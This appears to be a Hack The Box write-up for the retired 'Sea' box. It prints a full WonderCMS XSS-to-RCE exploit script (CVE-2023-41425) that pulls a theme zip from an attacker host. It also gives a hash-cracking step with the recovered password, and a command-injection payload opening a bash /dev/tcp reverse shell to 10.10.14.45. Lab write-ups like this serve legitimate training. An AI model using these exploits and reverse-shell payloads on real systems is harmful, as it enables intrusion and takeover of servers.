HTB Writeup Sea
Hacking 101 : Hack The Box Writeup 02
Sea is a retired Linux box on HTB with an easy difficulty rating, but the fuzzing part can be quite puzzly.
This is the write-up on how I hacked it. I encourage you to try finding the loopholes on your own first. 😊
I try writing one (maybe 2 if i get time) write ups every week here on medium and also they get pushed to my Github.
First things first, we will start with an Nmap scan to check for open ports.
nmap -sC -sV 10.129.197.88
From the result, we find 2 open ports.
Since the HTTP port is open, we can visit the webpage using the IP address.
Under “How To Participate” section , we can see a link to contact page.
Upon clicking that link we are redirected to “sea.htb/contact.php” , so lets pause here to add the IP address and domain to our /etc/hosts file.
The “Contact Us” page has a form for completing registration, but it appears to be a dead end with little to enumerate.
So lets go back to the main page http://sea.htb and lets try to get some intel.
Lets start by searching for directories and check if it has any :
We will use dirb this time:
dirb http://sea.htb
Fuzzing on this box is challenging and not the best experience.
To continue fuzzing, we used ffuf with a dedicated wordlist. It’s worth mentioning that you can also use a wordlist with dirb.
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://sea.htb/themes/FUZZ" -c -v
ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u "http://sea.htb/themes/bike/FUZZ" -t 200 -fc 403
Upon visiting http://sea.htb/themes/bike/README.md, we find some instructions.
Here, we discover that Wonder CMS is being used as the backend CMS. To check the version, we navigate to http://sea.htb/themes/bike/version, which shows 3.2.0.
After consulting the internet, we learn that WonderCMS v3.2.0 is vulnerable to CVE-2023–41425, a cross-site scripting (XSS) vulnerability.
Upon more googling we found the exploit too .
You can check the exploit here .
You can find the exploit online, but to simplify things, you can copy the code from below . Remember to change the IP address in the highlighted line to match your attacking machine.
Save the script as exploit.py.
# Exploit: WonderCMS XSS to RCE
import sys
import requests
import os
import bs4
if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = "http://sea.htb";
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.45:8000/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
if (xhr3.status == 200) {
var xhr4 = new XMLHttpRequest();
xhr4.withCredentials = true;
xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
xhr4.send();
xhr4.onload = function() {
if (xhr4.status == 200) {
var ip = "'''+str(sys.argv[2])+'''";
var port = "'''+str(sys.argv[3])+'''";
var xhr5 = new XMLHttpRequest();
xhr5.withCredentials = true;
xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
xhr5.send();
}
};
}
};
'''
try:
open("xss.js","w").write(data)
print("[+] xss.js is created")
print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
print("----------------------------\n")
XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
XSSlink = XSSlink.strip(" ")
print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
print("----------------------------\n")
print("\nstarting HTTP server to allow the access to xss.js")
os.system("python3 -m http.server\n")
except: print(data,"\n","//write this to a file")After saving the file, run this command to generate the malicious link. Ensure that you replace the IP address with your own.
python3 exploit.py http://sea.htb/index.php?page=LoginURL 10.10.14.35 4444
Now start the nc listener on port 4444
nc -lnvp 4444
Now, return to the registration form and use the malicious link to establish a reverse shell. Enter random details, but ensure you paste the link in the website section.
After waiting for a min or two , we can see activity on our listener , we got a shell back.
Now to make the shell more stable and usable , run this command.
script /dev/null -c bash
Enumerating the filesystem we find the database for WonderCMS located at /var/www/sea/data/database.js . Reading this file shows a password hash:
We got a password hash , but we still don't have a username so we check the /etc/passwd file and see which users can access a shell.
Now , firstly we have to crack the password hash , we will use hashcat for it . Save the password hash into a txt file and name it hash.txt.
echo '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q' > hash.txtThen use hashcat to crack bcrypt hashes.
hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Now we have user and password both , we can su with the user and enter the password we just found.
User:amay
Password:mychemicalromance
After successful attempt , now we can read the User flag at /home/amay/user.txt .
Privilege Escalation
Lets start checking if there are any other ports open internally.
netstat -ntlp
We can see that port 8080 is open internally. We forward that port to our local machine using SSH.
Open a new terminal on your linux distro and type :
ssh amay@sea.htb -L 8080:127.0.0.1:8080We will use the same password for amay as before.
Now open your browser and go to 127.0.0.1:8080 and login with amay credentials . You will see a interface like this.
Now fire up your burp , we will need to intercept a req.
After turning on the Proxy , chick Analyze on the web interface and capture the request and send it to Repeater.
Now we will tamper with log_file parameter to check command injection. Without knowing anything about the backend functionality , we can still look for exploitation by giving a command to create a new file. Lets do it.
Add this to your log_file parameter.
;touch /tmp/test.txtThen send the req.
Now we will check if the filesystem to see if we have created the file /tmp/test.txt .
We have successfully gained code execution through a simple command injection.
Let’s get a reverse shell using the following payload:
Before that fire up a new terminal and start listening on port 4444.
This is the payload for rev shell , make sure to use your ip.
bash -c ‘bash -i >& /dev/tcp/10.10.14.45/4444 0>&1’
But we have to url encode it , after encoding send it .
log_file=%2Fvar%2Flog%2Fapache2%2F;bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.45/4444+0>%261'&analyze_log=
After sending the request we obtain a root shell.
We can read the Root flag from /root/root.txt .
Congrats🥰 and have a good day ahead hacker.
